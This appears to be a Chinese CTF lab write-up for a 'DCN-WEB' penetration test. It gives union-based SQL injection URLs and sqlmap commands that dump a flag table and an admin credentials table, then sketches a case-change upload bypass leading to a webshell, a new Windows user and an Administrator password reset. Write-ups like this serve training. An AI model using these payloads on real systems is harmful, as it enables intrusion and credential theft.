1. 程式人生 > 其它 >DCN-WEB 滲透測試

DCN-WEB 滲透測試

DCN-WEB 滲透測試

官方推薦使用他們提供的攻擊機來做題,但是那玩意太卡了.....

1

隨便點一個就是注入點

正常情況下

存在注入情況下

經過and 1=1測試後發現這是一個數字型的注入點,剩下就是手注或者直接跑sqlmap了

先手注入

回顯位2,3

資料庫名web

http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(schema_name) from information_schema.schemata),4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(table_name) from information_schema.tables where table_schema='flag1'),4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(column_name) from information_schema.columns where table_name='key1') ,4 --+
http://172.16.1.102/about.php?id=-1 union select 1,user(),(select group_concat(flag) from flag1.key1),4 --+

sql注入跨庫參考指南:https://blog.csdn.net/lemeifei/article/details/121347468

法二:

python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D flag1 -T key1 --dump

2

檢視頁面原始碼給出後臺路徑

藉助上一題的注入,直接獲得賬號密碼

>python sqlmap.py -u http://172.16.1.102/about.php?id=1 -D web -T admin --dump

完成登陸

3

此路徑上存在上傳點

http://172.16.1.102/manage/index.php

直接就大小寫繞過了,但是不允許上傳jpg就離譜,接下來就可以上菜刀,直接拿flag。

http://172.16.1.102/upload/month_2112/202112170146193774.Php

4

新增使用者

遠端登陸檢視,這樣子看不flag,可能使用者不用啟動檔案也不同

改重置administrator的密碼,登陸administrator使用者檢視一下

C:\Documents and Settings\Administrator\「開始」選單\程式\啟動

進去直接檔案形式開啟就可以獲得flag (雖然它提示是損壞了,其實就是改了個字尾名)

5

開啟登錄檔regedit,找到這個檔案,發現打不開??

因為當前使用者是管理員就直接修改一下許可權

然後關掉,重新開啟一次

就這個使用者

完了